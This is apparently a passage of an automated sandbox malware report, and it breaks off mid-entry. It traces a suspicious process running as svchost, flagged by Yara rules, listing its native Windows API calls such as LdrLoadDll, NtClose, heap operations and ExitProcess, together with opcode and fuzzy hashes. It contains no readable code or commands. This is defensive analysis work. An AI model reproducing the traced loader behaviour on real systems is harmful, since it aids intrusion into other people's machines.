                                        execution_graph 76722 42c083 76723 42c0a0 76722->76723 76726 3572df0 LdrInitializeThunk 76723->76726 76724 42c0c8 76726->76724 76803 42fc53 76804 42eb53 RtlFreeHeap 76803->76804 76805 42fc68 76804->76805 76806 424d73 76807 424d8f 76806->76807 76808 424db7 76807->76808 76809 424dcb 76807->76809 76810 42ca93 NtClose 76808->76810 76811 42ca93 NtClose 76809->76811 76812 424dc0 76810->76812 76813 424dd4 76811->76813 76816 42ec73 RtlAllocateHeap 76813->76816 76815 424ddf 76816->76815 76817 425113 76821 42512c 76817->76821 76818 425174 76819 42eb53 RtlFreeHeap 76818->76819 76820 425184 76819->76820 76821->76818 76822 4251b7 76821->76822 76824 4251bc 76821->76824 76823 42eb53 RtlFreeHeap 76822->76823 76823->76824 76825 42ec33 76828 42cdb3 76825->76828 76827 42ec4e 76829 42cdcd 76828->76829 76830 42cdde RtlAllocateHeap 76829->76830 76830->76827 76727 417b23 76728 417b47 76727->76728 76729 417b83 LdrLoadDll 76728->76729 76730 417b4e 76728->76730 76729->76730 76831 413ff7 76835 414013 76831->76835 76833 41407c 76834 414072 76835->76833 76836 41b763 RtlFreeHeap LdrInitializeThunk 76835->76836 76836->76834 76837 3572b60 LdrInitializeThunk 76731 401acb 76732 401ae0 76731->76732 76735 4300c3 76732->76735 76738 42e703 76735->76738 76739 42e729 76738->76739 76748 407683 76739->76748 76741 42e73f 76747 401bdd 76741->76747 76751 41b453 76741->76751 76743 42e75e 76744 42e773 76743->76744 76745 42ce53 ExitProcess 76743->76745 76762 42ce53 76744->76762 76745->76744 76765 4167d3 76748->76765 76750 407690 76750->76741 76752 41b47f 76751->76752 76789 41b343 76752->76789 76755 41b4c4 76757 41b4e0 76755->76757 76760 42ca93 NtClose 76755->76760 76756 41b4ac 76758 41b4b7 76756->76758 76795 42ca93 76756->76795 76757->76743 76758->76743 76761 41b4d6 76760->76761 76761->76743 76763 42ce6d 76762->76763 76764 42ce7e ExitProcess 76763->76764 76764->76747 76766 4167f0 76765->76766 76768 416809 76766->76768 76769 42d4f3 76766->76769 76768->76750 76771 42d50d 76769->76771 76770 42d53c 76770->76768 76771->76770 76776 42c0d3 76771->76776 76777 42c0ed 76776->76777 76783 3572c0a 76777->76783 76778 42c119 76780 42eb53 76778->76780 76786 42ce03 76780->76786 76782 42d5af 76782->76768 76784 3572c11 76783->76784 76785 3572c1f LdrInitializeThunk 76783->76785 76784->76778 76785->76778 76787 42ce1d 76786->76787 76788 42ce2e RtlFreeHeap 76787->76788 76788->76782 76790 41b439 76789->76790 76791 41b35d 76789->76791 76790->76755 76790->76756 76798 42c173 76791->76798 76794 42ca93 NtClose 76794->76790 76796 42caad 76795->76796 76797 42cabe NtClose 76796->76797 76797->76758 76799 42c190 76798->76799 76802 35735c0 LdrInitializeThunk 76799->76802 76800 41b42d 76800->76794 76802->76800

                                        Executed Functions

                                        Function 00417B23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 43 417b23-417b3f 44 417b47-417b4c 43->44 45 417b42 call 42f733 43->45 46 417b52-417b60 call 42fd33 44->46 47 417b4e-417b51 44->47 45->44 50 417b70-417b81 call 42e1d3 46->50 51 417b62-417b6d call 42ffd3 46->51 56 417b83-417b97 LdrLoadDll 50->56 57 417b9a-417b9d 50->57 51->50 56->57
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B95
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 2df5ad1a77759440835b44e0c81d592d2dcef492499a061f42018885d7945096
                                        • Instruction ID: da5e64ab01b131cc96b5ec7ff34648e32b4ad6f3ea518197a63e5e5984a29078
                                        • Opcode Fuzzy Hash: 2df5ad1a77759440835b44e0c81d592d2dcef492499a061f42018885d7945096
                                        • Instruction Fuzzy Hash: 8D015EB5E0420DABDF10DBA1DC42FDEB3789B54308F4041BAE90897241F634EB588B95
                                        Function 0042CA93 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 63 42ca93-42cacc call 404a33 call 42dce3 NtClose
                                        APIs
                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAC7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: cf2b45a22dd28b00f8020047974d71a9615bfe0208659e68875304388e63bb0d
                                        • Instruction ID: 57ebef8ecfe624d0edae23a3c2bbfaab208ae6cfe1b98be8ccd3da2e80d7a6fc
                                        • Opcode Fuzzy Hash: cf2b45a22dd28b00f8020047974d71a9615bfe0208659e68875304388e63bb0d
                                        • Instruction Fuzzy Hash: D3E04F717406157BD510EA5ADC41FA7775CDFC5715F004029FA18A7241C77079008BA4
                                        Function 035735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 35735c0-35735cc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d3c647256941c7591f67b9c1b33ef351aa0f8012d3bb8240517a09a8a4625660
                                        • Instruction ID: 635ff0fb3b3614e60f566736777f56efcbdcc4d2a4cdcdff574c233184230ac5
                                        • Opcode Fuzzy Hash: d3c647256941c7591f67b9c1b33ef351aa0f8012d3bb8240517a09a8a4625660
                                        • Instruction Fuzzy Hash: 7D90023170550802D100B25855547461046D7D0311FA9C411A442556DD87958A5165A2
                                        Function 03572B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 77 3572b60-3572b6c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                        • Instruction ID: 457c78abb18feeb14149725498e1d226c4b2eaf328586fb1b4f1f17e32bb03f2
                                        • Opcode Fuzzy Hash: 6a8905976415fcc6c7416a0814b0aee926e7f0e0d53648d577d0a993153a632d
                                        • Instruction Fuzzy Hash: DA900261302404034105B2585454656404BD7E0311B99C021E5015595DC62589916125
                                        Function 03572DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 78 3572df0-3572dfc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                        • Instruction ID: 26917ed0f73f38a4eace80e7b34893c04d04172b55752e347161c2f58b8eb265
                                        • Opcode Fuzzy Hash: 6ccd23a833bb840e8264dce2594608ffdb558aadf62a2e9ba05e1108593b6a30
                                        • Instruction Fuzzy Hash: 9E90023130140813D111B2585544747004AD7D0351FD9C412A442555DD97568A52A121
                                        Function 0042CE03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 42ce03-42ce44 call 404a33 call 42dce3 RtlFreeHeap
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE3F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: ^hA
                                        • API String ID: 3298025750-899435009
                                        • Opcode ID: 28ef2d6e509b58d6041715ca700afd5f36670ba15aff7ef934103d6af870da59
                                        • Instruction ID: fdc617434d5545c9e1daa8437f2128e021f07645669b461a9ac1447847a7b8af
                                        • Opcode Fuzzy Hash: 28ef2d6e509b58d6041715ca700afd5f36670ba15aff7ef934103d6af870da59
                                        • Instruction Fuzzy Hash: 95E092B17042147BD610EE5AEC41FEB77ACEFC9715F004019F948A7241D670B910CBB8
                                        Function 0042CDB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 58 42cdb3-42cdf4 call 404a33 call 42dce3 RtlAllocateHeap
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,0041E8FE,?,?,00000000,?,0041E8FE,?,?,?), ref: 0042CDEF
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 758e987ca8dc1407da8ea2d75dd6bb0baa15a4ae5a41ed448168bd99f93428ac
                                        • Instruction ID: 17918fafe77d7918c94f1f76fa1d91a88606a9b90730fcf91da8eea324c1dce9
                                        • Opcode Fuzzy Hash: 758e987ca8dc1407da8ea2d75dd6bb0baa15a4ae5a41ed448168bd99f93428ac
                                        • Instruction Fuzzy Hash: F7E06DB16042087BD610EE99DC41FDB73ACEFC9715F000419FD08A7242D670B910CBB8
                                        Function 0042CE53 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 68 42ce53-42ce8c call 404a33 call 42dce3 ExitProcess
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_400000_svchost.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 4a72a8c2f97c2ed90bbe4c78ab3260a7f6740fedc81c4197864b34bdc353a8b3
                                        • Instruction ID: 7260838757c880d35975b7de4a4f432aa71238a31e89e9968f4fb0110fc70f5c
                                        • Opcode Fuzzy Hash: 4a72a8c2f97c2ed90bbe4c78ab3260a7f6740fedc81c4197864b34bdc353a8b3
                                        • Instruction Fuzzy Hash: 4AE086756002147BD520EA5ADC41FDB776CDFC5724F004419FA08A7142C7B07901C7F4
                                        Function 03572C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 73 3572c0a-3572c0f 74 3572c11-3572c18 73->74 75 3572c1f-3572c26 LdrInitializeThunk 73->75
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8f2a81fa6dd17e5497f43e0ff9b17454cea71f8b0b58ba57d634140eb3f5eecd
                                        • Instruction ID: ae4038d81268c54db95a8d7c1132b0d3271e2478b71f2ebc004e3458dcd49d74
                                        • Opcode Fuzzy Hash: 8f2a81fa6dd17e5497f43e0ff9b17454cea71f8b0b58ba57d634140eb3f5eecd
                                        • Instruction Fuzzy Hash: AFB09B719015C5D5DA11F76066087177949B7D0711F5DC461D3030647E4739C1D1E175

                                        Non-executed Functions

                                        Function 035D705E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: B3q$kLsE
                                        • API String ID: 3446177414-64223463
                                        • Opcode ID: 40b21b8a83ad24fb030fbdbe24c7ca5bdafe3afcf87cf2f163f53cffab0db4a7
                                        • Instruction ID: b4395baba6b0de67d85217a1c615f0dfe8e15b0ea48f7d630e784d5a3b051a45
                                        • Opcode Fuzzy Hash: 40b21b8a83ad24fb030fbdbe24c7ca5bdafe3afcf87cf2f163f53cffab0db4a7
                                        • Instruction Fuzzy Hash: 39419B31501B928AE331FFA9F844B697BE4BB90724F1A1618EC508F1EDCBB44481CB91
                                        Function 035AD1C0 Relevance: .1, Instructions: 135COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                        • Instruction ID: f9bcff5d4f6bfd17a443b4adcabac56cfc75faa0c7d4e0e82633de4f6f442450
                                        • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                        • Instruction Fuzzy Hash: 33513675A00606DFCB18CF68D4916AEFBF1FF48314B18856ED819A7705E734EA80DB90
                                        Function 03574340 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                        • Instruction ID: 79c36234720274889e510d8a999a0b7425fa70a0e924b407cdc8139bfc2788b4
                                        • Opcode Fuzzy Hash: 663ba2ca6556a154c2dc122cf02178b7a890628afd0aaab7784bfa8ced465476
                                        • Instruction Fuzzy Hash: 86900231705804129140B25858C45864046E7E0311B99C011E4425559C8B148A565361
                                        Function 03573010 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31dcffc1fbd3a90979e6587558ba9047055818e266bc7392fdde24a3efc482fd
                                        • Instruction ID: 725dc15ce315458cdf11f315cd1665b47d02e2f842b1f75d7839558b388babb8
                                        • Opcode Fuzzy Hash: 31dcffc1fbd3a90979e6587558ba9047055818e266bc7392fdde24a3efc482fd
                                        • Instruction Fuzzy Hash: 5B90022130184842D140B3585844B4F4146D7E1312FD9C019A8157559CCA1589555721
                                        Function 03573090 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 604f5f1bc0520c4933bb851db82a789a24c3338a26db27cdcfe243a11e8ebf85
                                        • Instruction ID: d4fa7b74b01e4928e63248db0993e280967c0829d8b445ac48594cbe8e5df26b
                                        • Opcode Fuzzy Hash: 604f5f1bc0520c4933bb851db82a789a24c3338a26db27cdcfe243a11e8ebf85
                                        • Instruction Fuzzy Hash: 1D90022134140C02D140B25894547470047D7D0711F99C011A4025559D87168A6566B1
                                        Function 03574650 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                        • Instruction ID: 1cdd0faeda76bb7300b6d1cc02c03c9f7f8ea72854ff8eb6bf320c4417342635
                                        • Opcode Fuzzy Hash: d62b8dc2a93950c841b4bb49021e758ec2c8099ece53ed4989248a87205dbd56
                                        • Instruction Fuzzy Hash: 29900261701504424140B25858444466046E7E13113D9C115A4555565C871889559269
                                        Function 03572BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                        • Instruction ID: b3436e42d3914cf4c4cb3cffb2d4153c9b23ff6f79605a2cb47885fd604d6d6c
                                        • Opcode Fuzzy Hash: aecd7f88243f29b6cd407874b902b30b057c76207dbb9c0468c5112da7000b44
                                        • Instruction Fuzzy Hash: 9790023130140C02D180B258544468A0046D7D1311FD9C015A4026659DCB158B5977A1
                                        Function 03572BE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                        • Instruction ID: feb61bbf589ed7805aec5d32ddd0d2438b9dcaf2427a6c7edc2e677004227c0c
                                        • Opcode Fuzzy Hash: fc01f1a61899e8641ba18a06eb7508c983c62ec380395e250a57f386bca51718
                                        • Instruction Fuzzy Hash: BD90023130544C42D140B2585444A860056D7D0315F99C011A4065699D97258E55B661
                                        Function 03572B80 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71a00c5a0b8843a29da09da231493e2d4aa9df3e2d5f424e2af303b0f5e10f63
                                        • Instruction ID: fe11128d522112e9bfb3d939bf68b84bd9de92b040a1e3e89b4b16b8c80f6ca6
                                        • Opcode Fuzzy Hash: 71a00c5a0b8843a29da09da231493e2d4aa9df3e2d5f424e2af303b0f5e10f63
                                        • Instruction Fuzzy Hash: 6790023130140C02D104B25858446C60046D7D0311F99C011AA02565AE976589917131
                                        Function 03572BA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                        • Instruction ID: 159e6b9a8c87ab6772aef97436f84bc157bd74f3fc7ec69429bb47341f37a4f7
                                        • Opcode Fuzzy Hash: dfa9a5f5860a7941eecd4de34c7f4d36b4a3187a52665dae140885d0e2d1378d
                                        • Instruction Fuzzy Hash: D390023170540C02D150B25854547860046D7D0311F99C011A4025659D87558B5576A1
                                        Function 03572AD0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                        • Instruction ID: bb2d9ff60167903135882ab1c6a3556c71aab08f7e172c41589b85a04ffa86f1
                                        • Opcode Fuzzy Hash: 5d97abc56b7be79a5c6e4baed7a2543d8db4995a4c6c3cf4ea583f10a3a2489a
                                        • Instruction Fuzzy Hash: DD900435311404030105F75C174454700C7D7D53713DDC031F5017555CD731CD715131
                                        Function 03572AF0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                        • Instruction ID: 62eee3e28032652a3cee3761c5cd73f479c45e7deb2fa4ef879cd2002161097d
                                        • Opcode Fuzzy Hash: 9f544d5bca54e2105390a3ad8a924ac7d92ee70f6596dbef0e5c9d34ca21a86a
                                        • Instruction Fuzzy Hash: 71900225321404020145F658164454B0486E7D63613D9C015F5417595CC72189655321
                                        Function 03572AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88c05dc81a4efefb074f3630795ea92c31b27a3b7664d6981422fac868f61a88
                                        • Instruction ID: d44e4679f7b2884c5a7f8f7452f7e7d6c045aa1b6e48e15a967e1f39ee9f6865
                                        • Opcode Fuzzy Hash: 88c05dc81a4efefb074f3630795ea92c31b27a3b7664d6981422fac868f61a88
                                        • Instruction Fuzzy Hash: 7E9002A1301544924500F3589444B4A4546D7E0311B99C016E5055565CC62589519135
                                        Function 035739B0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3834294808883dfae1e9d0bb6f75905d261b8926a62c3168090066222e119a09
                                        • Instruction ID: 295967581174012070ee20fa07e333704b256ffe5d27894d0e01658dd420e91f
                                        • Opcode Fuzzy Hash: 3834294808883dfae1e9d0bb6f75905d261b8926a62c3168090066222e119a09
                                        • Instruction Fuzzy Hash: 0A90022134545502D150B25C54446564046F7E0311F99C021A4815599D865589556221
                                        Function 03572F60 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cdad86cdec1ba73bae603606ec15570a68353e5602ca86dd81c930688f77d2d3
                                        • Instruction ID: 396880b235dc81a4106016e1f60fbc43d815bc4c2171ae6747009a0183ed9211
                                        • Opcode Fuzzy Hash: cdad86cdec1ba73bae603606ec15570a68353e5602ca86dd81c930688f77d2d3
                                        • Instruction Fuzzy Hash: 1D90026131140442D104B25854447460086D7E1311F99C012A6155559CC6298D615125
                                        Function 03572F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                        • Instruction ID: 6d5b222a0f62db53fc5b95ab31557e7ee5b50262cf3aab6058fa01a1d96d82b1
                                        • Opcode Fuzzy Hash: a6a5813f2353bf39e4a152bb67d1d85241ec24c8eba7929ecfd1f5e973676432
                                        • Instruction Fuzzy Hash: F090026134140842D100B2585454B460046D7E1311F99C015E5065559D8719CD526126
                                        Function 03572FE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                        • Instruction ID: eae4651246cda45a2ccbe3c396d0afd765965ca343e324362d4f29e71bd95b34
                                        • Opcode Fuzzy Hash: 5552ff27ed38fdf7b8b2579f1b4c43cbead5f11e14f8c9866c7f681bd5754c47
                                        • Instruction Fuzzy Hash: 15900221311C0442D200B6685C54B470046D7D0313F99C115A4155559CCA1589615521
                                        Function 03572F90 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74eadc964dc2e242ef867ab2c9fe94fda5aa9d418e8382548ec3457d6e4ad965
                                        • Instruction ID: 1bef5c8d0207ecde6fbb0e7a0ad96c126950642d87bc709aa76d4adbb12960fc
                                        • Opcode Fuzzy Hash: 74eadc964dc2e242ef867ab2c9fe94fda5aa9d418e8382548ec3457d6e4ad965
                                        • Instruction Fuzzy Hash: 4490023130180802D100B258585474B0046D7D0312F99C011A516555AD872589516571
                                        Function 03572FB0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
